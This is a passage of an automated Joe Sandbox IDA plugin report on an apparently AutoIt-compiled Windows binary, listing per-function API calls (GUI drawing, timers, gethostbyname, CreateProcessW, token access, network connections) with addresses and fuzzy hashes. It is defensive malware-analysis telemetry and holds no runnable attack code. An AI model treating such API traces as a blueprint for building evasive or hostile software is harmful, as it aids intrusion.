  • Part of subcall function 00FF571C: __NMSG_WRITE.LIBCMT ref: 00FF573A
  • Part of subcall function 00FF571C: RtlAllocateHeap.NTDLL(01500000,00000000,00000001,00000000,?,?,?,00FF0DD3,?), ref: 00FF575F
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: f43b849f1ba131092060ebd6278c946e55339c4144578df80e94fc6bdf0503f7
• Instruction ID: 1e92b8dcce56a5df34fba5c51bde5678f32994fa1e5ad844fbc1d56e40230ab0
• Opcode Fuzzy Hash: f43b849f1ba131092060ebd6278c946e55339c4144578df80e94fc6bdf0503f7
• Instruction Fuzzy Hash: 1F110A72504619AEEF332F74AC056BE37D8AF443A1F104569FBC49A1E1DE3D84419F90
APIs
• _memset.LIBCMT ref: 00FD44CF
  • Part of subcall function 00FD407C: _memset.LIBCMT ref: 00FD40FC
  • Part of subcall function 00FD407C: _wcscpy.LIBCMT ref: 00FD4150
  • Part of subcall function 00FD407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FD4160
• KillTimer.USER32(?,00000001,?,?), ref: 00FD4524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FD4533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0100D4B9
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 13d3f968b92e35d09888151b3a6a8607669c0a38bab4899b24b4c6dd67688e78
• Instruction ID: 3b587ea71b847c1476df53a952fada8ab6a8d69e62518f0e0520ee03be0fb715
• Opcode Fuzzy Hash: 13d3f968b92e35d09888151b3a6a8607669c0a38bab4899b24b4c6dd67688e78
• Instruction Fuzzy Hash: 4021F8709043849FF7739BA49855BEBBBECAF01314F08008EE7CE56281C7792984DB51
APIs
  • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01037896,?,?,00000000), ref: 00FD5A2C
  • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01037896,?,?,00000000,?,?), ref: 00FD5A50
• gethostbyname.WSOCK32(?,?,?), ref: 01046399
• WSAGetLastError.WSOCK32(00000000), ref: 010463A4
• _memmove.LIBCMT ref: 010463D1
• inet_ntoa.WSOCK32(?), ref: 010463DC
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: e792b5efca116c58b3d533fda110363802d2011a4f677ddfe4cc91c609a728e7
• Instruction ID: a672375f1c9581c24411165e8ad9c26bc855e35bcd5f103f67b0665d651b4f7e
• Opcode Fuzzy Hash: e792b5efca116c58b3d533fda110363802d2011a4f677ddfe4cc91c609a728e7
• Instruction Fuzzy Hash: 7E11607650010AAFCB00FBA4DD96CEEB7B9AF04310B084066F545A7261DF39AE04EB61
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 01028B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 01028B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 01028B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 01028BA4
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 36365a6ab55e68a143d4c4f0d49e30d320ec3932e5442d5298394cb03768c5f2
• Instruction ID: 3527764936a8f1f909a5907d170eabeda850fab01383817928b34c214a39f522
• Opcode Fuzzy Hash: 36365a6ab55e68a143d4c4f0d49e30d320ec3932e5442d5298394cb03768c5f2
• Instruction Fuzzy Hash: 85112E79901219FFEB11DFA5CC85F9EBBB4FB48710F204096EA40B7250D6716E11DB94
APIs
  • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
• DefDlgProcW.USER32(?,00000020,?), ref: 00FD12D8
• GetClientRect.USER32(?,?), ref: 0100B5FB
• GetCursorPos.USER32(?), ref: 0100B605
• ScreenToClient.USER32(?,?), ref: 0100B610
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: 99e980452e0327c16f0f583bcb448990c418bf3464d0ab9b34eb1468ab6fe35c
• Instruction ID: 8280e26b00e24b97e83a2968ba857c7df364986ee6c7c820e1aa001646f62a42
• Opcode Fuzzy Hash: 99e980452e0327c16f0f583bcb448990c418bf3464d0ab9b34eb1468ab6fe35c
• Instruction Fuzzy Hash: 9A112B3550011AFBCB11EFA8D8859EF77BAFB05301F540456EA41E7240C73AAA519BA5
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 0103115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 01031184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 0103118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 010311C1
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 9e82d7ef020d4bfb2c0d7394460411eac9ff1ddd6f969f0014f7e1993c402245
• Instruction ID: 578ff058107801af968531b796cff0464a582794d091bc6be8f3a9142e5d3884
• Opcode Fuzzy Hash: 9e82d7ef020d4bfb2c0d7394460411eac9ff1ddd6f969f0014f7e1993c402245
• Instruction Fuzzy Hash: DE111831D4161DD7CF10AFA5D848AEEBBB8FF4A711F044045EA81B2245CB7595508BD5
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0102D84D
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0102D864
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0102D879
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0102D897
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: fc303ac1e0fe00a8242cf115b6ab566186df7522417ec4adb66a8b6397d6bc49
• Instruction ID: b32116e4f4bb975e3db2784229beee9c2070f75159f43ad651a944f8bbf25f31
• Opcode Fuzzy Hash: fc303ac1e0fe00a8242cf115b6ab566186df7522417ec4adb66a8b6397d6bc49
• Instruction Fuzzy Hash: 7B115E75605315DBE3208F90D808F97BBBCEB00B00F00856AE6DAD6040DBF5E9499FA1
APIs
Memory Dump Source
• Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: 2905b226278cd9e2e9f3127549766783849234290b2adebc4edb445b27a47b27
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: B5017E3604014EFBEF139E88CC05CED3F66BB28250F488555FA98580B0C23BE5B1AB81
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 0105B2E4
                                                                    • ScreenToClient.USER32(?,?), ref: 0105B2FC
                                                                    • ScreenToClient.USER32(?,?), ref: 0105B320
                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0105B33B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                    • String ID:
                                                                    • API String ID: 357397906-0
                                                                    • Opcode ID: 87b43ae2680569cee3aeaf3cb90912b351cceb10614ba4ed1fcf3f4dd2b8cd35
                                                                    • Instruction ID: 8261d0b2325986b9a98b5a0ae69aafd064608d22dd1c93b9f986bcdc34f72656
                                                                    • Opcode Fuzzy Hash: 87b43ae2680569cee3aeaf3cb90912b351cceb10614ba4ed1fcf3f4dd2b8cd35
                                                                    • Instruction Fuzzy Hash: 491144B9D0020AEFDB51DFA9C4849EEBBF9FF08210F108156E954E3214D735AA558F60
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0105B644
                                                                    • _memset.LIBCMT ref: 0105B653
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01096F20,01096F64), ref: 0105B682
                                                                    • CloseHandle.KERNEL32 ref: 0105B694
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 3277943733-0
                                                                    • Opcode ID: 9182c21723925d79c2525706431feaad014d06a1d47c3e15c2d2fbec9a2fb220
                                                                    • Instruction ID: 2dc6468220e9b1827839338a8bc29ee63f0f69194308ac484492d128392bd077
                                                                    • Opcode Fuzzy Hash: 9182c21723925d79c2525706431feaad014d06a1d47c3e15c2d2fbec9a2fb220
                                                                    • Instruction Fuzzy Hash: 76F05EB25403047AF7202765AC36FBB3A9CFB09395F404020BB88E5196D77F580097A8
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 01036BE6
                                                                      • Part of subcall function 010376C4: _memset.LIBCMT ref: 010376F9
                                                                    • _memmove.LIBCMT ref: 01036C09
                                                                    • _memset.LIBCMT ref: 01036C16
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 01036C26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                    • String ID:
                                                                    • API String ID: 48991266-0
                                                                    • Opcode ID: 2bd287d405562da43b0ff6b27cf61ef700679d3430a9a2510ef583a9fe879b44
                                                                    • Instruction ID: b6aec92f8d32ce27fa58234310bd78398a8923f713942b6b1f2338738ca8995b
                                                                    • Opcode Fuzzy Hash: 2bd287d405562da43b0ff6b27cf61ef700679d3430a9a2510ef583a9fe879b44
                                                                    • Instruction Fuzzy Hash: 89F0547A100205ABCF016F55DC84A8ABB29EF45360F04C051FE099E226CB35E811DBB4
                                                                    APIs
                                                                      • Part of subcall function 00FD12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FD134D
                                                                      • Part of subcall function 00FD12F3: SelectObject.GDI32(?,00000000), ref: 00FD135C
                                                                      • Part of subcall function 00FD12F3: BeginPath.GDI32(?), ref: 00FD1373
                                                                      • Part of subcall function 00FD12F3: SelectObject.GDI32(?,00000000), ref: 00FD139C
                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0105BD40
                                                                    • LineTo.GDI32(00000000,?,?), ref: 0105BD4D
                                                                    • EndPath.GDI32(00000000), ref: 0105BD5D
                                                                    • StrokePath.GDI32(00000000), ref: 0105BD6B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                    • String ID:
                                                                    • API String ID: 1539411459-0
                                                                    • Opcode ID: 7ba896fd013eb2ad5d7d7353131c597df3869dbd70a8481326e3a3777f613bc5
                                                                    • Instruction ID: e5a744284678cd7b771aed224b4dae13f291e3fe532934d90e3658030ac23cab
                                                                    • Opcode Fuzzy Hash: 7ba896fd013eb2ad5d7d7353131c597df3869dbd70a8481326e3a3777f613bc5
                                                                    • Instruction Fuzzy Hash: F7F0BE3100125ABBDB222F55AC0DFCF3F99BF06311F084041FA90650D1877E1650CBA5
                                                                    APIs
                                                                    • GetSysColor.USER32(00000008), ref: 00FD2231
                                                                    • SetTextColor.GDI32(?,000000FF), ref: 00FD223B
                                                                    • SetBkMode.GDI32(?,00000001), ref: 00FD2250
                                                                    • GetStockObject.GDI32(00000005), ref: 00FD2258
                                                                    • GetWindowDC.USER32(?,00000000), ref: 0100BE83
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0100BE90
                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0100BEA9
                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0100BEC2
                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0100BEE2
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0100BEED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1946975507-0
                                                                    • Opcode ID: 13d5ce910927cd83229577e02de1f230bcc7c61d8cc34c6b06925b5dacb463f4
                                                                    • Instruction ID: 48d28528748cc687d6a73b5f638d8fb6c84152e832fc8808b40eed0aa917152c
                                                                    • Opcode Fuzzy Hash: 13d5ce910927cd83229577e02de1f230bcc7c61d8cc34c6b06925b5dacb463f4
                                                                    • Instruction Fuzzy Hash: F9E03932504245AAEB625F68E80DBDA3F11EB16336F0483A6FBA9580E5C77A4580DB12
                                                                    APIs
                                                                    • GetCurrentThread.KERNEL32 ref: 0102871B
                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,010282E6), ref: 01028722
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,010282E6), ref: 0102872F
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,010282E6), ref: 01028736
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3974789173-0
                                                                    • Opcode ID: d45c60f7df67df7a28cf49653162ea179a76d613c7099fee8b4c374e98e8c3b2
                                                                    • Instruction ID: f2fb0aa587e2e2f9376d1fca6c8b6441049fe13b0a0101d7eb3ee6f434a003b5
                                                                    • Opcode Fuzzy Hash: d45c60f7df67df7a28cf49653162ea179a76d613c7099fee8b4c374e98e8c3b2
                                                                    • Instruction Fuzzy Hash: 4BE04F766113229BD7705EB45D0CB573BE8EF50791F048858F2C5CA084D62D80518750
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 01011D5D
                                                                    • GetDC.USER32(00000000), ref: 01011D67
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 01011D87
                                                                    • ReleaseDC.USER32(?), ref: 01011DA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: a7719d11cde8fdc8975a591918a68f8bebe3fde636e4a031c7d0c1780ebeeda9
                                                                    • Instruction ID: 92526254c79afbe1fc3d5e127434ea6ebbea9fab1e3bb54cff8880befdcfaa87
                                                                    • Opcode Fuzzy Hash: a7719d11cde8fdc8975a591918a68f8bebe3fde636e4a031c7d0c1780ebeeda9
                                                                    • Instruction Fuzzy Hash: 66E0E575800206EFCF116FB0D80865E7BB2AB4C351F148016F99A97214DB7D8141AF50
                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 01011D71
                                                                    • GetDC.USER32(00000000), ref: 01011D7B
                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 01011D87
                                                                    • ReleaseDC.USER32(?), ref: 01011DA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    • Opcode ID: 7cde9147826a2a35f3d76422bd81d4af5fa87da9aec8d7b17c79bbac11a21559
                                                                    • Instruction ID: 27868876b6aa06627e1608a6e1dd2ca672cf0c6053258b64535ac4f66fcca5f9
                                                                    • Opcode Fuzzy Hash: 7cde9147826a2a35f3d76422bd81d4af5fa87da9aec8d7b17c79bbac11a21559
                                                                    • Instruction Fuzzy Hash: 55E0E575800206AFCF215FB0C80865E7BB2AB4C351F148015F99997210DB7D9141AF50
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0102B4BE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ContainedObject
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 3565006973-3941886329
                                                                    • Opcode ID: 87490cfbff8c9f1f42498542e8be283f7f6ae328f84754348a96a6b28a2517f8
                                                                    • Instruction ID: 1500c06b7ad025ed92ac81360c37c5ad3f0b156adacd3e520531ab80d944b38f
                                                                    • Opcode Fuzzy Hash: 87490cfbff8c9f1f42498542e8be283f7f6ae328f84754348a96a6b28a2517f8
                                                                    • Instruction Fuzzy Hash: 6E915970600611AFDB54DF68C884B6ABBE9FF49710F20856DE98ACF6A1DB71E841CB50
                                                                    APIs
                                                                      • Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                    • __wcsnicmp.LIBCMT ref: 0103B02D
                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0103B0F6
                                                                    Strings
                                                                    Memory Dump Source
